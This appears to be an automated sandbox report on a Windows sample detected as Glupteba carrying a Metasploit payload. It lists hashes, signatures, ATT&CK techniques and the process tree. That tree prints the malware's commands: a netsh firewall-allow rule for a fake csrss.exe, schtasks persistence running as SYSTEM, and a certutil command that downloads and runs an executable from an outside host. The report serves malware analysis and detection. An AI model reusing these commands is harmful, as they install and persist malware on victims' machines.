Analysis

  • max time kernel
    152s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    14-07-2022 00:54

General

  • Target

    49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe

  • Size

    3.8MB

  • MD5

    7211b52a2128346943f4630764c26301

  • SHA1

    3d5abd24418cc11ae96c4b3be8c36008856fb4ad

  • SHA256

    49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9

  • SHA512

    d8bdc1a4ed5efeb13b6c2c22502436869abf3f296785a3b77304db1e6514fec249b5759ab0389485d70a64750a41fd0391e30dbe6955d9dac77182b4aef36222

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 7 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe
    "C:\Users\Admin\AppData\Local\Temp\49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1476
    • C:\Users\Admin\AppData\Local\Temp\49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe
      "C:\Users\Admin\AppData\Local\Temp\49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4548
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4780
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          PID:656
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4172
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:3156
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:3152
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          PID:2452
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:2596
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4548 -s 872
        3⤵
        • Program crash
        PID:2996
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 916
      2⤵
      • Program crash
      PID:3540
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4144
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1476 -ip 1476
    1⤵
      PID:4432
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4548 -ip 4548
      1⤵
        PID:4196

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      1
      T1112

      Discovery

      Query Registry

      1
      T1012

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        7211b52a2128346943f4630764c26301

        SHA1

        3d5abd24418cc11ae96c4b3be8c36008856fb4ad

        SHA256

        49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9

        SHA512

        d8bdc1a4ed5efeb13b6c2c22502436869abf3f296785a3b77304db1e6514fec249b5759ab0389485d70a64750a41fd0391e30dbe6955d9dac77182b4aef36222

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        7211b52a2128346943f4630764c26301

        SHA1

        3d5abd24418cc11ae96c4b3be8c36008856fb4ad

        SHA256

        49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9

        SHA512

        d8bdc1a4ed5efeb13b6c2c22502436869abf3f296785a3b77304db1e6514fec249b5759ab0389485d70a64750a41fd0391e30dbe6955d9dac77182b4aef36222

      • memory/656-137-0x0000000000000000-mapping.dmp
      • memory/1476-131-0x0000000003B60000-0x0000000004362000-memory.dmp
        Filesize

        8.0MB

      • memory/1476-133-0x0000000000400000-0x000000000334E000-memory.dmp
        Filesize

        47.3MB

      • memory/1476-134-0x0000000000400000-0x000000000334E000-memory.dmp
        Filesize

        47.3MB

      • memory/1476-130-0x00000000037AF000-0x0000000003B56000-memory.dmp
        Filesize

        3.7MB

      • memory/2452-147-0x0000000000000000-mapping.dmp
      • memory/2596-149-0x0000000000000000-mapping.dmp
      • memory/3152-145-0x0000000000000000-mapping.dmp
      • memory/3156-144-0x0000000000000000-mapping.dmp
      • memory/4172-139-0x0000000000000000-mapping.dmp
      • memory/4172-143-0x0000000003C00000-0x0000000003FA7000-memory.dmp
        Filesize

        3.7MB

      • memory/4172-146-0x0000000000400000-0x000000000334E000-memory.dmp
        Filesize

        47.3MB

      • memory/4172-150-0x0000000003C00000-0x0000000003FA7000-memory.dmp
        Filesize

        3.7MB

      • memory/4172-151-0x0000000000400000-0x000000000334E000-memory.dmp
        Filesize

        47.3MB

      • memory/4548-142-0x0000000000400000-0x000000000334E000-memory.dmp
        Filesize

        47.3MB

      • memory/4548-138-0x0000000000400000-0x000000000334E000-memory.dmp
        Filesize

        47.3MB

      • memory/4548-135-0x0000000003825000-0x0000000003BCC000-memory.dmp
        Filesize

        3.7MB

      • memory/4548-132-0x0000000000000000-mapping.dmp
      • memory/4780-136-0x0000000000000000-mapping.dmp